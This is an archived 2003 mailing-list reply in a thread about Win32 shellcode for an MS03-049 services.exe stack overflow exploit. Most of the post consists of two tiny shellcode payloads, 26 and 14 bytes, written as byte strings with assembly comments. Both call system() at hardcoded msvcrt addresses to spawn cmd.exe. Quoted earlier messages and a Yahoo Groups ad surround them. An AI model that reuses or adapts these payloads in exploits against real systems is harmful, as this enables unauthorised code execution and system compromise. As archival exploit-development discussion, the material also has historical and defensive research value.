Vulnerability Development mailing list archives
RE: [PenTest] Re: Win32 Shellcode question.
From: "Brett Moore" <brett.moore () security-assessment com>
Date: Tue, 2 Dec 2003 11:34:30 +1300
http://www.newroot.de/projects/winsys.c // very smaal win2000/NT local shellcode (smaalest i've seen) /* 26byte execute system("cmd.exe "); written by newroot */ unsigned char hellcode[]= "\x8b\xec" // mov ebp, esp "\x55" // push ebp "\x8b\xec" // mov ebp, esp "\x68\x65\x78\x65\x20" // push 0x20657865 "\x68\x63\x6d\x64\x2e" // push 0x2e646d63 "\x8d\x45\xf8" // lea eax,[ebp-0x8] "\x50" // push eax "\xb8" // mov eax, "\xad\xaa\x01\x78" // 0x7801aaad <- adress of system() "\xff\xd0" // call eax ;
; 14 byte no null byte execute system("cmd") 54 push esp ; or pushf to put null terminator on stack 68 63 6D 64 20 push 20646D63h ; push cmd 54 push esp ; push location of cmd B8 BF 8E 01 78 mov eax,78018EBFh ; address of system() FF D0 call eax ; call system -----Original Message----- From: Tobias Klein [mailto:tobias.klein () ewetel de] Sent: Monday, December 01, 2003 9:07 PM To: Vinay A. Mahadik; vuln-dev () securityfocus com; pentest () yahoogroups com Subject: [PenTest] Re: Win32 Shellcode question. http://www.newroot.de/projects/winsys.c greets newroot At 19:29 27.11.2003 -0800, Vinay A. Mahadik wrote:
I was writing an exploit for the MS03-049 services.exe stack overflow vuln
------------------------ Yahoo! Groups Sponsor ---------------------~--> Buy Ink Cartridges or Refill Kits for your HP, Epson, Canon or Lexmark Printer at MyInks.com. Free s/h on orders $50 or more to the US & Canada. http://www.c1tracking.com/l.asp?cid=5511 http://us.click.yahoo.com/mOAaAA/3exGAA/qnsNAA/kgFolB/TM ---------------------------------------------------------------------~-> To unsubscribe from this group, send an email to: PenTest-unsubscribe () yahoogroups com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
Current thread:
- Re: Win32 Shellcode question. Tobias Klein (Dec 01)
- RE: [PenTest] Re: Win32 Shellcode question. Brett Moore (Dec 01)